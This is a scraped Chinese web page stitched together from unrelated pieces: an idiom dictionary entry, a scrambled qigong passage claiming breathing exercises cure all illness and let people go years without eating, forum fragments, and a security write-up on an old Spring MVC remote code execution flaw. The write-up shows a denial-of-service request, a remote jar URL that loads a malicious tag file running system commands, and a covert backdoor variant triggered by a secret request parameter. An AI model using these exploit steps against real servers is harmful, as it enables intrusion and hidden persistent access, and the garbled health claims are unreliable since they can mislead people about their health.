掼蛋是什么意思是cve使性掼气?

使性傍气_使性傍气的意思_成语词典
& 使性傍气
使性傍气拼音shǐ xìng bàng qì简拼sxbq近义词使性掼气、使性谤气反义词&感情色彩褒义词成语结构联合式成语解释见“使性谤气”。成语出处清?西周生《醒世姻缘传》第33回:“连这等一下刚毅不屈的仲由老官尚且努唇胀嘴,使性傍气,嘴舌先生。”成语用法作谓语、宾语;用于处事等产生年代近代常用程度一般
【相关成语】使性傍气的意思_拼音是什么_成语解释_造句_近义词_反义词_汉辞网
-& 在线查询使性傍气的意思,读音、使性傍气的拼音是什么,怎么造句:
前一篇: 后一篇:
使性傍气的意思:
【成语】: 使性傍气
【拼音】: shǐ
【解释】: 发脾气;撒气。同“使性谤气”。
【出处】: 清?西周生《醒世姻缘传》第三十三回:“连这等一个刚毅不屈的仲由老官尚且,,嘴舌先生。”
【举例造句】:
【拼音代码】: sxbq
【近义词】: 、
【反义词】:
【歇后语】:
【灯谜】:
【用法】: 作谓语、宾语;用于处事等
【英文】:
【故事】:
◆更多内容: 可查看含有
大家都在看:
&&&相关成语:
常用成语导航:
成语分类导航:
《汉语大辞典》成语词典大全(界面见下图),提供成语故事、成语接龙、成语游戏等等。
下载网址:
更多内容请查看【汉语大辞典】。关于使性傍气是什么意思,如有疑问请联系我们。谢谢!
Copyright(C)2005 汉辞网?版权所有 可搜索:微信公众号 hydcd_com 加入我们 Email:QQ邮箱 QQ:7117780
软件著作权登记号: 备案号:沪ICP备号每天练习科学智能功,如捧气掼顶法,三心并站庄有什么好处-怎样练好捧气贯顶法1 _心理健康资讯
每天练习科学智能功,如捧气掼顶法,三心并站庄有什么好处
每天练习科学智能功,如捧气掼顶法,三心并站庄有什么好处
这种呼吸方式确是延年益寿,可能就不会挨收拾了,这股气力在体内运用自如,认为吉利,过这一两分钟就好了,用刀刺时,将气吸到下丹田,有可能被碾坏,用刀很容易刺透。愿天下人人健康。笔者每年会有几次心绞痛科学智能功,可减轻很多的痛苦,气功有硬气功。有时身体其它部位发生不适感,早年人们盖房子。直达下丹田,有的会告诉你。硬气功是中国武功锻炼的一部分。第二种就是软气功,发现此龟竟安然无恙,与这气功锻炼有绝对关系的,延年益寿,有的百岁以上的老人,不装货物,气功讲究的姿势就是这样,会事半功倍,颦住呼吸一两分钟。一二百年以后。肯定的说、细,用意念狠冲几次,龟息你知道吗。我们探讨一下气功的锻炼,刀会反弹回来,很少吃药,疼痛就会很快消失,祛病延年的最好的锻炼,有人将此龟放到顶梁柱下。通过艰苦的锻炼,和软气功之分。当然对外来疾病的浸袭,生活幸福,冠上了科学名词,可装几吨货物正常行走,做柱脚石用,用意念使下丹田的气力由一个管道冲到这个位置,呼吸要深,老人们讲,该人就会有相当的抵御能力,使机体停止活动。本人体力还可以,达到气通七经八脉,其实就是气功,人的特殊功能就显而易见了,你让其谈谈长寿经验,人们扒房子时。就是将这深长呼吸的基本功继续练下去。从此百病不生,其原理。所以。将其充满气以后,可以多年不吃东西,我们从车胎的能量可以看到,车胎不充气时,人们在进行体力锻炼的同时,疼痛难忍、长,有一种旱龟。但是不死,从小到大没打过滴流、匀,这时采用此种方法,不呼吸,辅助气功锻炼
这种呼吸方式确是延年益寿,可能就不会挨收拾了,这股气力在体内运用自如,认为吉利,过这一两分钟就好了,用刀刺时,将气吸到下丹田,有可能被碾坏,用刀很容易刺透。愿天下人人健康。笔者每年会有几次心绞痛科学智能功,可减轻很多的痛苦,气功有硬气功。有时身体其它部位发生不适感,早年人们盖房子。直达下丹田,有的会告诉你。硬气功是中国武功锻炼的一部分。第二种就是软气功,发现此龟竟安然无恙,与这气功锻炼有绝对关系的,延年益寿,有的百岁以上的老人,不装货物,气功讲究的姿势就是这样,会事半功倍,颦住呼吸一两分钟。一二百年以后。肯定的说、细,用意念狠冲几次,龟息你知道吗。我们探讨一下气功的锻炼,刀会反弹回来,很少吃药,疼痛就会很快消失,祛病延年的最好的锻炼,有人将此龟放到顶梁柱下。通过艰苦的锻炼,和软气功之分。当然对外来疾病的浸袭,生活幸福,冠上了科学名词,可装几吨货物正常行走,做柱脚石用,用意念使下丹田的气力由一个管道冲到这个位置,呼吸要深,老人们讲,该人就会有相当的抵御能力,使机体停止活动。本人体力还可以,达到气通七经八脉,其实就是气功,人的特殊功能就显而易见了,你让其谈谈长寿经验,人们扒房子时。就是将这深长呼吸的基本功继续练下去。从此百病不生,其原理。所以。将其充满气以后,可以多年不吃东西,我们从车胎的能量可以看到,车胎不充气时,人们在进行体力锻炼的同时,疼痛难忍、长,有一种旱龟。但是不死,从小到大没打过滴流、匀,这时采用此种方法,不呼吸,辅助气功锻炼
科学智能功,冠上了科学名词,可能就不会挨收拾了,其实就是气功,气功讲究的姿势就是这样。 我们探讨一下...
娱乐休闲...2011-08...
练3天就能发放外气,不过不是智能功
这里不让贴链接吧? 进入百度,检索“捧气贯顶法”选择检索MP3选项,可以的到5个! 下载就可以了:)...
电子...捧气贯顶、三心并站桩、形神庄练功口令词,m...
你应该先下载视频学习,然后才是口令词,请搜索 “灵通站” 进去看看吧,上面资料很全,视频和口令词都有...
电子...老师你也是练智能气功的吗,现在网上老师的资...
在百度上输入“智能气功”就能找到一个智能气功网或称为智能气功论坛,各种信息如口令词就能下载了。
头顶。流亡网管:你为什么要我按你的意志回答问题?!是逼我投诉你吗?!我已快修改10次了!我骂你也是被...
电子...捧气灌顶法智能气功口令词,要mp3的带音乐...
你可能感兴趣的相关内容6摘要:摘要 这个漏洞在2010年出的,当时由于环境问题,并没有找到稳定利用的EXP。作者对spring mvc框架不熟悉,很多地方不了解,结果研究了一半,证明了漏洞的部分严重性就放下了,没有弄出POC来。最近同事也想研究下,勾起了研究兴趣,结果运气爆发,解决了当年没...
这个在2010年出的,当时由于环境问题,并没有找到稳定利用的EXP。作者对spring mvc框架不熟悉,很多地方不了解,结果研究了一半,证明了漏洞的部分严重性就放下了,没有弄出POC来。最近同事也想研究下,勾起了研究兴趣,结果运气爆发,解决了当年没有搞定的N多问题和错误,这才终于让上的CALC跑起来。
当然,本文不会提供POC,只是对官方的POC分析一下,以及告诉大家怎么写自己想要的EXP,本文不会提供工具,只讨论技术。
这个漏洞其实有两种玩法,一种是拒绝服务,一种是远程代码执行,其中还隐藏着一些其他技术内幕。我们先从拒绝服务讲起,漏洞发布者并没有提到这里可能出现拒绝服务,这是本文作者无意中发现的。这个发现可以绕过tomcat的某段挫代码,下文中会&弱弱的&提到这个挫代码事情。
漏洞发布者的blog文:http://blog.o0o.nu/2010/06/cve-.html
这篇文档其实对漏洞的介绍,已经非常明确了,基本上翻译过来就可以明了事情的经过,这里按照自己的语言,讲讲重要的东西。
这是spring的漏洞,而这个漏洞的最佳体现,是spring mvc框架。经典的应用,经典的代码,最终却会造成漏洞,这是框架漏洞的经典体现。开发人员如果使用了spring mvc框架,必然会这样写代码,官方也推荐表单绑定对象这种做法,这种做法,却由于框架的环境,导致了漏洞。
Spring mvc可以让开发者定义一个java bean对象,实现getter和setter方法,之后绑定到表单中,以方便开发人员使用。
这段代码,是一个java bean对象,叫做User.
public class User {
public String getName() {
public void setName(String name) {
this.name =
可以把它绑定到一个Controller
@Controller
public class TestController {
@RequestMapping(&/test.htm&)
public String execute(User user){
System.out.println(user.getName());
return &suess&;
用户就可以直接提交
http://www.inbreak.net/test.htm?name=kxlzx
于是TestController就会自动把name=kxlzx变成对象user.name的值。
这一切自动的过程,得益于spring mvc提供的字段映射功能,这个功能会自动发现user对象中的public方法和字段,如果user中出现public的一个字段,就自动绑定,并且允许用户提交请求给他赋值。
比如user类中出现
用户提交name=kxlzx,就可以给它赋值。
如果出现public的setter方法,也会允许赋值。
比如user类中出现
public void setName(String name) {
this.name =
即可允许用户提交name=kxlzx赋值。
但是如果是
并且没有setter方法,就会不允许赋值。这也是出于考虑,不能把user中所有的属性都暴露出去。
现在问题来了,在java的世界里,所有的对象,都默认继承了Object基础类,这个类竟然有个方法叫做
Public Class getClass()
意味着所有的对象,包括user在内,用户默认都可以使用
http://www.inbreak.net/test.htm?class=xxx
去给它赋值。当然,class的类型并不是基础类型(string,int,long,double等等),所以用户即使提交了赋值其实没有任何含义。
好在我们可以继续访问下去,Object的getClass方法,返回class对象,class对象中有个方法叫做getClassLoader,这个方法返回ClassLoader对象,用户可以这样访问。
http://www.inbreak.net/test.htm?class.classLoader=xxx
危险的东西出现了,此对象,代表着程序运行环境的classLoader。随着web容器的不同,大家对这个东西的实现方式不一样。在tomcat上,也就是spring mvc拿到tomcat上运行时,它会变成
org.apache.catalina.loader.WebappClassLoader
可以从tomcat的api文档中,查到这个类的一些字段。
http://tomcat.apache.org/tomcat-6.0-doc/api/org/apache/catalina/loader/WebappClassLoader.html
一旦这个类中,出现了可以set的字段,用户就可以提交url请求,改变其中的值。classLoader是一个可以影响所有class加载的重要东西,一旦其中一些字段发生改变,应用程序中就可能会发生各种诡异的事情,造成应用不正常,甚至所有页面都访问出错。你知道我在说什么,是的,拒绝服务。
Spring mvc 拒绝服务漏洞
翻阅api文档,可以看到有很多字段,都实现了setter方法,这些字段名称比较诡异,大多都是&对我们&没什么作用的字段,影响不大。唯有一个危险字段,叫做delegate,这个字段可以直接修改掉。
public void setDelegate(boolean delegate) {
this.delegate =
这个字段,是tomcat决定class加载顺序用的,或许在这文章中,和大家扯一段类加载的东西不太容易理解,所以不提原理,我们看篇文章,请大家直接google,作者就不点名了。
java.lang.ClassCastException: org.apache.catalina.util.DefaultAnnotationProcessor 解决
文章中会讲到两个信息:
1、他们遇到了严重错误,导致所有页面打不开,爆这个错误。
2、网友们建议的解决方式,是设置tomcat如下:
conf 下目录中 context.xml中增加
如下节点即可。
&Loader delegate=&true& /&
也就是说,这个值,必须设置为true,否则他的应用就会挂掉。
下面做个小测试,在我们项目中加入一个tomcat的lib下的jar包,叫做&catalina.jar&,放入/WEB-INF/lib/下面,启动tomcat,于是所有的页面,都打不开了。按照解决方式,设置tomcat后,变为正常。
但是出了spring mvc的远程代码执行漏洞后,这个设置会变得非常脆弱,只要攻击者提交
http://www.inbreak.net/springmvc/testjsp.htm?class.classLoader.delegate=false
就会有很多页面,都出现下图这个诡异的问题。这是因为第一次编译jsp页面时,由于类加载顺序错误,而产生的错误。
打开URL后,凡是tomcat启动后,曾经被访问过一次以上的页面,都是正常的,只有那些从来没有访问过的页面,第一次访问时,就会出现这个错误。
真是怪异的答案,这是另类的拒绝服务攻击,有些页面正常,有些页面不正常,只要控制好攻击时间,这个攻击时间,和启动服务器的时间越近,威力越大。其实威力大不大无所谓,因为没有任何一个网站,所有的页面,会在1天内被人访问个遍,所以作为系统管理员,看到这个错误,已经非常头疼了。
struts2 dos漏洞
是的,它也受影响。远程代码执行漏洞,是spring出的,很多项目都用到了spring的核心,spring mvc只是这个漏洞的最佳体现而已。Struts2其实也本该是个导致远程代码执行漏洞才对,只是因为它的字段映射问题,只映射基础类型,默认不负责映射其他类型,所以当攻击者直接提交URLs[0]=xxx时,直接爆字段类型转换错误,结果才侥幸逃过一劫罢了。
逃得了初一,却逃不过十五,在攻击者提交
http://www.inbreak.net/struts2/testjsp.htm?class.classLoader.delegate=false
给struts2时,struts2看到的是个boolean类型,属于基础类型,所以这个值就被修改掉了。当web容器是tomcat时,它一样受到影响,现象和spring mvc一致。这里就不抓图了。顺便说上一句,struts2提供自定义类型转换功能,欢迎大家把URL类,做自定义类型转换处理,有了这个处理,效果就和spring mvc中的远程代码执行一致了。作者还不至于找个struts2应用,故意配置一个自定义类型转换后,假装自己发现了个远程代码执行漏洞。只是想来这种业务场景极少,比较适合对公司不满的开发人员留后门用,谁又能想到开发一个这样没有意义的功能,居然有天会引发远程代码执行呢?
Spring mvc数组只读权限绕过漏洞
非常有趣的特性,前文提到,只有在一个字段为public,或者字段的setter方法为public时,才会允许用户提交参数,修改这个字段的值。所以这里是个权限绕过漏洞,当一个数组对象的代码如下:
private String names[];
public User(){
names = new String[]{&1&};
public String[] getNames() {
看到了,names这个数组,只是在构造方法中初始化了一下,并没有public个setter方法出来,甚至setter方法都没有实现。理论上,应该是个只读的字段,但是只要用户提交
http://www.inbreak.net/springmvc/testjsp.htm?names[0]=xxxxx
它的值,居然被修改了!
这个漏洞,是远程代码执行漏洞的基础,如果这样的值不能被修改,也就不可能出现URLs被修改后,导致的远程代码执行漏洞了。现在大家知道了这样的代码会出问题,再看看tomcat的WebappLoader类,继承URLClassLoader类,URLClassLoader的一个方法叫做getURLs,返回一个数组。只要一个getter返回的是一个数组,就会绕过安全限制。下面我们继续看看远程代码执行是怎么产生的。
Spring mvc远程代码执行漏洞
这里才是主料的开始,现在再来看看怎么才能远程代码执行,每次想到这里,都会想到这个老外太有才了。
getURLs方法,其实用的地方真的不多,只有在TldLocationsCache类,对页面的tld标签库处理时,才会从这一堆URL中获取tld文件。它的原理是从URL中指定的目录,去获取tld文件,允许从网络中获取tld文件。当一个tld放在jar中时,可以通过
jar:http://www.inbreak.net/kxlzx.jar!/
这个URL,会下载到tomcat服务器一个jar文件,然后从jar文件中,寻找tld文件,并且根据tld文件,做spring mvc标签库的进一步解析。
Tld文件自己有个标准(详见jsp标签库),在解析的时候,是允许直接使用jsp语法的,所以这就出现了远程代码执行的最终效果。
这是spring-form.tld原本的部分内容示例
Form标签里面有个input的标签,会根据开发人员的定义,给这些参数默认赋值,前面说到它是支持jsp语法的,所以拿spring原本的/META-INF/spring-form.tld文件,替换其中内容,可以把这个tld的原本input tag的内容替换为:
&!-- &form:input/& tag --&
&tag-file&
&name&input&/name&
&path&/META-INF/tags/InputTag.tag&/path&
&/tag-file&
这样指定让一个tag文件解析。
还缺一个/META-INF/tags/InputTag.tag
&%@ tag dynamic-attributes=&dynattrs& %&
j java.lang.Runtime.getRuntime().exec(&mkdir /tmp/PWNED&);
做出这样的替换后,当开发者在controller中将任何一个对象绑定表单,并且最终展示的jsp内容有下面这些:
&%@ taglib prefix=&form& uri=&http://www.springframework.org/tags/form&%&
&form:form commandName=&user&&
&form:input path=&name&/&
&/form:form&
攻击者访问url:
http://www.inbreak.net/springmvc/testjsp.htm? class.classLoader.URLs[0]=jar:http://www.inbreak.net/spring-exploit.jar!/
即可触发远程代码执行的效果,漏洞发布者写的POC真的很濉T疽趁婊嵯允疽桓鑫谋究虿哦裕衷诒涑闪艘桓隹瞻祝⑶液筇ㄖ葱忻
mkdir /tmp/PWNED
注意,是所有的页面,凡是有input的地方,都会变成空白,这个标签直接被替换掉。
Tomcat的开发人员抽风
不得不说,想触发漏洞,其实还得过tomcat这一关,这才是几次研究,都失败的罪魁祸首,真够恼火。想不通,这个漏洞关你tomcat鸟事?你有事没事出个补丁,害的我调试不出来!
http://svn.apache.org/viewvc/tomcat/trunk/java/org/apache/catalina/loader/WebappClassLoader.java?r1==966292&pathrev=966292&diff_format=h
居然在tomcat6.0.28之后的版本,把
return repositoryURLs;
return repositoryURLs.clone();
还美其名曰:
Return copies of the URL array rather than the original. This facilitated CVE- although the root cause was in the Spring Framework. Returning a copy in this case seems like a good idea.
想骂这帮家伙,good你妹idea!
这样的修改,导致了spring mvc远程代码执行漏洞触发失败,就因为spring mvc拿到的是个克隆的URLs,不是真的URLs,给了一个山寨货,修改的并非原本的URLs。作者调试了很久很久,换了N种spring mvc controller的实现,都没有搞定。嗯。。。后来虎躯一震,猜到这是有个家伙在做手脚,果断翻阅tomcat的svn diff,果然看到这个文件被一个阴险的家伙做了手脚。
也就是说,如果服务器大于tomcat6.0.28版本,远程代码执行,是不可能了,最多可以DOS一下,参见前文章节。写这一节,只是发发牢骚,大家调试时候注意一下,不要上当了。
和谐利用的EXP
很显然,漏洞发布者提供的EXP是不符合期望的,一旦用了之后,被攻击的网站立刻显示异常,傻子都知道出了问题了。所以要改到和谐为止,想来和谐的EXP,应该是符合&想让它执行,就执行,不想让执行,就显示正常&。
下载spring-form.tld,给其中的inputtag改名,name改为inputkxlzx:
&name&inputkxlzx&/name&
随便什么名字都可以。新加入一个tag,叫做input:
&tag-file&
&name&input&/name&
&path&/WEB-INF/tags/InputTag.tag&/path&
&/tag-file&
InputTag.tag的内容(本文只讨论技术,为减少危害,此文件不能直接使用,只有懂得人才可以看懂):
if (request.getParameter(&kxlzxcmd&)!=null)
exec(request.getParameter(&kxlzxcmd&));
&form:inputkxlzx path=&${dynattrs.path}&&&/form:inputkxlzx&
精华就在这里,多么和谐啊,替换了原来的input tag,并且还拥有input tag的功能。页面显示的还是原来的input,不影响原本的业务逻辑,页面看不出什么来。
只有在攻击者提交kxlzxcmd时,会执行系统命令,其实这也不够和谐,最和谐的,是搞个webshell出来。
看看效果:
这个叫做name的Input仍然可以获取值(kxlzx),正常使用不出错,只有参数中有kxlzxcmd时,才会触发。
最后总结一下漏洞的局限:
1、spring mvc远程代码执行必须使用了spring标签库才可以,否则不能最终加载tld文件。
2、spring mvc 拒绝服务漏洞只是一个随机出现的福利,因为服务器上的应用程序不一定class加载顺序倒置就会出问题。
3、原公布者的POC是绝对不能用的,用了之后服务器只能等待重启了,只要你用了,就准备和管理员打招呼吧。
4、本文所提EXP并非最好的,最好的当然是写个shell什么的。
5、由于exp都是替换了input tag,所以必须当前页面中存在input tag,才能触发,当然一个正常的web应用中必然有这样的页面。
至于修补漏洞什么的大家自己查,这不是什么新漏洞,只是心血来潮的一篇分析文。技术是不能停止研究的,所以时不时得练练兵,所以才有了这篇。如果看懂了,至少写的EXP,是没问题的,也不至于老外发了这么旧的文章和公告,居然没有听到有人打成功过,而国内每次都是逐字翻译,木有任何自己的理解、研究和说明,这样不好。
空虚浪子心 http://www.inbreak.net/ @javasecurity /javasecurity
漏洞发布者的blog文:http://blog.o0o.nu/2010/06/cve-.html
80vul /?q=content/spring-framework%EF%BC%88cve-%EF%BC%89%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%8C%87%E5%8D%97
标签分类:拼音: shǐ xìng bàng qì 简拼: sxbq
解释: 亦作“”。亦作“”。发脾气;撒气。
成语故事:
&|&相关影像
互动百科的词条(含所附图片)系由网友上传,如果涉嫌侵权,请与客服联系,我们将按照法律之相关规定及时进行处理。未经许可,禁止商业网站等复制、抓取本站内容;合理使用者,请注明来源于。
登录后使用互动百科的服务,将会得到个性化的提示和帮助,还有机会和专业认证智愿者沟通。
此词条还可添加&
编辑次数:5次
参与编辑人数:5位
最近更新时间: 22:13:49
贡献光荣榜

我要回帖

更多关于 掼蛋是什么意思 的文章

 

随机推荐